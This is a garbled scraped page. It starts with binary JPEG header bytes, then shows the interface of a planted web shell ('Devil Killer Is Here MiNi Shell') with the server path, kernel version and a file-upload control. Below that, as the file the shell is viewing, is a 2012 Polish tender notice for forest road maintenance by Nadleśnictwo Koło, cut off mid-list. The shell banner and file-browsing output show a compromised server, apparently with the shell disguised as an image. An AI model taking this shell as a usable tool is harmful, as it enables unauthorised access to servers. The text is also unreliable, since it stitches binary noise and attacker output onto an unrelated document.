JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120828/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120828/318158-N-2012.html

<p class="kh_header"><b>Izbica Kujawska: Utrzymanie dróg leśnych w Nadlesnictwie Koło w 2012r.</b><br>
<b>Numer ogłoszenia: 318158 - 2012; data zamieszczenia: 28.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Nadleśnictwo Koło , Gaj Stolarski 2, 87-865 Izbica Kujawska, woj. kujawsko-pomorskie, tel. 54 2865084, faks 54 2865084.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.poznan.lasy.gov.pl/kolo/index.html</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowe Gospodarstwo Leśne Lasy Państwowe.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Utrzymanie dróg leśnych w Nadlesnictwie Koło w 2012r..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest wykonanie konserwacji w ramach bieżącego utrzymania dróg, poprzez wymianę i uzupełnienie nawierzchni kruszywem łamanym i kruszywem naturalnym, układanie wałków sosnowych, płyt żelbetowych, odwodnienie drogi i utrzymanie profilu dróg leśnych.
2.Zamówienie podzielono na 3 części, zwane dalej Pakietami.

1)	Pakiet nr 1: Utrzymanie dróg na terenie Nadleśnictwa Koło, w tym:

Leśnictwo Zbylczyce , Uroczysko Smardzew, oddz. 258 i 261, Powiat Łęczycki, gmina Grabów, obr.  ew. Polamy
Wykonanie  konserwacji w ramach bieżącego utrzymania poprzez uzupełnienie i wymianę płyt betonowych nawierzchni , które wzmocnią istniejące podłoże i ustabilizują istniejącą nawierzchnię, która będzie mogła służyć przez okrągły rok potrzebom gospodarki leśnej. Konserwację nawierzchni projektuje się poprzez wymianę uszkodzonych i uzupełnienie brakujących żelbetowych płyt drogowych o wymiarach 0,8x2,8x0,14m układanych na podsypce piaskowej:
- podsypka piaskowa gr.5-10cm;
- drogowe płyty żelbetowe (materiał inwestora) o wym.0,8x2,8x0,14m układane w poprzek lub wzdłuż oraz odwodnienie drogi poprzez konserwację jednostronnego rowu i zbiornika odparowującego .
Leśnictwo Bugaj, oddz. 146, Powiat Kolski, gmina Babiak, Obr.ew. Kiejsze
Wykonanie  konserwacji w ramach bieżącego utrzymania poprzez uzupełnienie i wymianę nawierzchni kruszywem łamanym i kruszywem naturalnym poprzez odtworzenie podbudowy i nawierzchni , będzie mogła służyć przez okrągły rok potrzebom gospodarki leśnej. Naprawę nawierzchni projektuje się poprzez wykorzystanie materiałów miejscowych , naturalnych - kruszywo łamane z odzysku i kruszywo naturalne ( żwir , pospółka ) odtwarzając nast. konstrukcję nawierzchni :
- 20 cm warstwa podbudowy z kruszywa łamanego o frakcji 31,5/63 mm na gruncie rodzimym;
- 10 cm w-wa z kruszywa naturalnego( żwir, pospółka ) o frakcji 0/31,5 mm ;
oraz odwodnienie drogi poprzez odtworzenie/konserwację  jednostronnego rowu i zbiornika odparowującego .
Leśnictwo Sobótka, oddz. 77,  Powiat Łęczycki, gmina Grabów, Obr.ew. Radzyń
Wykonanie  konserwacji w ramach bieżącego utrzymania poprzez uzupełnienie i wymianę nawierzchni kruszywem łamanym i kruszywem naturalnym poprzez odtworzenie podbudowy i nawierzchni , będzie mogła służyć przez okrągły rok potrzebom gospodarki leśnej. Naprawę nawierzchni projektuje się poprzez wykorzystanie materiałów miejscowych , naturalnych - kruszywo łamane z odzysku i kruszywo naturalne ( żwir , pospółka ) odtwarzając nast. konstrukcję nawierzchni :
- 20 cm warstwa podbudowy z kruszywa łamanego o frakcji 31,5/63 mm na gruncie rodzimym;
- 10 cm w-wa z kruszywa naturalnego( żwir, pospółka ) o frakcji 0/31,5 mm ;
oraz odwodnienie drogi poprzez odtworzenie/konserwację  jednostronnego rowu i zbiornika odparowującego .
Leśnictwo Dąbie, Ur. Ladorudz, oddz. 339, 340,0 331, 332, Powiat Kolski, gmina Dąbie, Obr.ew. Ladorudz
Wykonanie  konserwacji w ramach bieżącego utrzymania zostaną wzmocnione poprzez uzupełnienie podłoża wałkami sosnowymi (materiał inwestora), nawierzchni kruszywem łamanym i naturalnym ( odtworzenie górnej i dolnej warstwy nawierzchni ) , która wzmocni istniejące podłoże i ustabilizuje istniejącą nawierzchnię dzięki czemu drogi będą mogły służyć przez okrągły rok potrzebom gospodarki leśnej. Naprawę nawierzchni projektuje się wykonać, wykorzystując materiały inwestora ( wałki sosnowe ) oraz miejscowe , naturalne ( żwir , pospółka ) oraz kruszywo łamane (z odzysku ) , w następujący sposób, w zależnosci od lokalizacji:
1. Uzupełnienie wałków sosnowych :
- wałki sosnowe o śr. 10-15cm o długości 3,00m układane w poprzek drogi na gruncie rodzimym;
- 15 cm w-wa z kruszywa naturalnego( żwir, pospółka ) o frakcji 0/31,5 mm ;
2. Uzupełnienie kruszywem łamanym z odzysku :
- 10-20 cm warstwa podbudowy z kruszywa łamanego o frakcji 31,5/63 mm na gruncie rodzimym;
- 10-15 cm w-wa z kruszywa naturalnego( żwir, pospółka ) o frakcji 0/31,5 mm ;
3. Uzupełnienie nawierzchni żwirowej :
- 15 cm w-wa z kruszywa naturalnego( żwir, pospółka ) o frakcji 0/31,5 mm ;
Sposób nr 4 (profilowanie nawierzchni) .
Oraz odwodnienie drogi poprzez naprawę przydrożnego rowu i zbiorników odparowujących .

2)	 Pakiet nr 2: Utrzymanie dróg na terenie Nadleśnictwa Koło, w tym:

Leśnictwo Rogóźno, ur. Jasieniec , oddział 47,48,49,50, Powiat Kolski, gmina Przedecz Obr.ew. Dziwie
Wykonanie konserwacji w ramach bieżącego utrzymania przez uzupełnienie podłoża wałkami sosnowymi, nawierzchni kruszywem łamanym i kruszywem naturalnym poprzez wykonanie górnej warstwy nawierzchni , która wzmocni istniejące podłoże i ustabilizuje istniejącą nawierzchnię będą mogły służyć przez okrągły rok potrzebom gospodarki leśnej. Konserwację nawierzchni projektuje się wykonać wykorzystując materiały inwestora ( wałki sosnowe ) oraz miejscowe , naturalne ( żwir , pospółka ) i pochodzące z odzysku kruszywo łamane, w następujący sposób, w zależnosci od lokalizacji:
1. Uzupełnienie wałków sosnowych :
- wałki sosnowe o śr. 10-15cm o długości 3,00m układane w poprzek drogi na gruncie rodzimym;
- 20 cm w-wa z kruszywa naturalnego( żwir, pospółka ) o frakcji 0/31,5 mm ;
2. Uzupełnienie kruszywem łamanym z odzysku:
- 20 cm warstwa podbudowy z kruszywa łamanego o frakcji 31,5/63 mm na gruncie rodzimym;
- 10 cm w-wa z kruszywa naturalnego( żwir, pospółka ) o frakcji 0/31,5 mm ;
3. Profilowanie nawierzchni równiarką.
Oraz  naprawa przydrożnego rowu i zbiorników odparowujących , przepustów.

3)	 Pakiet nr 3: Utrzymanie profilu  dróg leśnych - minimum dwukrotny przejazd walcem samojezdnym i  równiarką. 

Leśnictwo Rzuchów, obr. Ew. Rzuchów, gm. Dąbie
Leśnictwo Rzuchów. Obr.ew. Ladorudzek, gm. Grzegorzew
Leśnictwo Lipie Góry, Obr.ew. Kiejsze, gm. Babiak
Leśnictwo Sobótka, Obr.ew. Sobótka, gm. Grabów
Leśnictwo Sobótka, Obr.ew. Turzynów, gm. Chodów
Lesnictwo Sobótka, Obr.ew. Dzierzbice, gm. Chodów

3.Wykonawca zobowiązuje się wykonać zamówienie przy użyciu materiałów własnych- kruszywo łamane, pospółka, żwir oraz z materiałów Zamawiającego (Inwestora) - wałki sosnowe, płyty żelbetowe..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający, przewiduje możliwość udzielenia zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 6 ustawy, w wysokości nieprzekraczającej 50% wartości zamówienia podstawowego.
Zamówienia uzupełniające polegać będą na powtórzeniu tego samego rodzaju zamówienia tzn.  utrzymania dróg leśnych, na terenie Nadlesnictwa Koło.
Zamawiający z ważnych przyczyn jest uprawniony ograniczyć przedmiot umowy w stosunku do zakresu określonego w SIWZ. Ograniczenie przedmiotu umowy w stosunku do zakresu określonego w SIWZ nie stanowi niewykonania lub nienależytego wykonania zobowiązania a w związku z tym nie jest podstawą do ponoszenia jakichkolwiek roszczeń wobec Zamawiającego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 77.20.00.00-2, 45.23.32.20-7, 45.11.12.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Zamawiający wymaga wniesienia wadium w kwocie: 
1) Pakiet nr 1- 2200,00zł (PLN) słownie: dwa tysiące dwieście złotych
2) Pakiet nr 2- 3500,00zł (PLN) słownie: trzy tysiące pięćset złotych.
3) Pakiet nr 3- 400,00zł (PLN) słownie: czterysta złotych
2. 	Wadium może być wnoszone wedle wyboru Wykonawcy w jednej lub kilku następujących formach:
1)	pieniądzu
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3)	gwarancjach bankowych
4)	gwarancjach ubezpieczeniowych;
5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tekst jedn. Dz. U. z 2007 r. Nr 42, poz. 275, z późn. zm.).
Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego: BZWBK o/ Koło 06109012030000000020002214. 
3. 	Wadium należy wnieść w terminie do dnia 10 września 2012r. do godz. 12.00- do terminu składania ofert. W przypadku wniesienia wadium w pieniądzu, za moment wniesienia wadium uznaje się moment uznania rachunku Zamawiającego. 
4.	W przypadku wniesienia wadium w innej formie niż pieniądz, termin ważności wystawionego dokumentu powinien być zgodny z terminem związania ofertą.
5.	W przypadku wniesienia wadium w formie gwarancji/poręczenia, gwarancja/poręczenie powinna/powinno być sporządzona zgodnie z obowiązującym prawem i winna/winien zawierać następujące elementy:
1)	nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji/poręczenia (Zamawiającego), gwaranta (banku lub instytucji ubezpieczeniowej udzielających gwarancji/poręczenia) oraz wskazanie ich siedzib,
2)	określenie wierzytelności, która ma być zabezpieczona gwarancją/poręczeniem,
3)	kwotę gwarancji/poręczenia,
4)	zobowiązanie gwaranta/poręczyciela do zapłacenia kwoty gwarancji/poręczenia na pierwsze pisemne żądanie Zamawiającego w okolicznościach określonych w art. 46 ust. 4a PZP oraz art. 46 ust. 5 PZP. 
5) 	klauzule o zmianie postanowień treści gwarancji za zgodą beneficjenta</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalność objęta przedmiotem zamówienia nie wymaga specjalnych uprawnień w związku, z czym Zamawiający nie precyzuje tego warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Dla Pakietu nr 1 Wykonawca wykaże się wykonaniem w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 2 usług, polegających na konserwacji nawierzchni dróg gruntowych, na kwotę co najmniej 50 000,00zł (PLN) netto każda. 
2. Dla Pakietu nr 2 Wykonawca wykaże się wykonaniem w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 2 usług, polegających na konserwacji nawierzchni dróg gruntowych, na kwotę co najmniej 70 000,00zł (PLN) netto każda. 
3. Dla Pakietu nr 3 Wykonawca wykaże się wykonaniem w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 2 usług, polegających na konserwacji nawierzchni dróg gruntowych, na kwotę co najmniej 5 000,00zł (PLN) netto każda. 
4. Ocena spełniania warunków udziału w postępowaniu oraz ocena braku podstaw do wykluczenia z postępowania zostanie dokonana na podstawie dokumentów wymaganych- w przypadku oceny warunku wiedzy i doświadczenia Wykonawca złoży wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych,
usług w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wnioskow o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krotszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorcow, oraz załaczeniem dokumentu potwierdzajacego, że te usługi zostały wykonane lub sa wykonywane należycie; wg wzoru - .- składanego odrębnie dla każdego z Pakietów.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Dla Pakietu nr 1 Wykonawca dysponuje odpowiednim potencjałem technicznym w postaci:
- środka transportu do przewozu płyt żelbetowych i wałków sosnowych- 1szt.
- koparki podsiębiernej o poj. łyżki 0,6m3-1szt.
- samochódu samowyładowczego 5-10t- 1szt
- równiarki samojezdnej- 1szt
- walec samojezdnego- 1szt
2. Dla Pakietu nr 2 Wykonawca dysponuje odpowiednim potencjałem technicznym w postaci:
- środka transportu do przewozu wałków sosnowych- 1szt.
- koparki podsiębiernej o poj. łyżki 0,6m3-1szt.
- samochódu samowyładowczego 5-10t- 1szt
- równiarki samojezdnej- 1szt
- walec samojezdnego- 1szt
3. Dla Pakietu nr 3 Wykonawca dysponuje odpowiednim potencjałem technicznym w postaci:
- równiarki samojezdnej- 1szt
- walec samojezdnego- 1szt
4. Ocena spełniania warunków udziału w postępowaniu oraz ocena braku podstaw do wykluczenia z postępowania zostanie dokonana na podstawie dokumentów wymaganych- w przypadku oceny warunku dysponowania potencjałem technicznym Wykonawca złoży wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych Wykonawcy usług  w celu realizacji zamowienia wraz z informacja o podstawie dysponowania tymizasobami; - składany odrębnie dla każdego z Pakietów.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje tego warunku.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Dla Pakietu nr 1 Wykonawca posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę ubezpieczenia nie mniejszą niż 50 000,00zł oraz posiada środki finansowe w wysokości co najmniej 50 000,00 zł lub zdolność kredytową w wysokości co najmniej 50 000,00zł. 
2. Dla Pakietu nr 2 Wykonawca posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę ubezpieczenia nie mniejszą niż 70 000,00zł oraz posiada środki finansowe w wysokości co najmniej 70 000,00 zł lub zdolność kredytową w wysokości co najmniej 70 000,00zł. 
3. Dla Pakietu nr 3 Wykonawca posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę ubezpieczenia nie mniejszą niż 5 000,00zł oraz posiada środki finansowe w wysokości co najmniej 5 000,00 zł lub zdolność kredytową w wysokości co najmniej 5 000,00zł. 
4. Ocena spełniania warunków udziału w postępowaniu oraz ocena braku podstaw do wykluczenia z postępowania zostanie dokonana na podstawie dokumentów wymaganych- w przypadku oceny warunku sytuacji finansowej i ekonomicznej Wykonawca złoży opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia oraz informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których Wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy, wystawionej nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

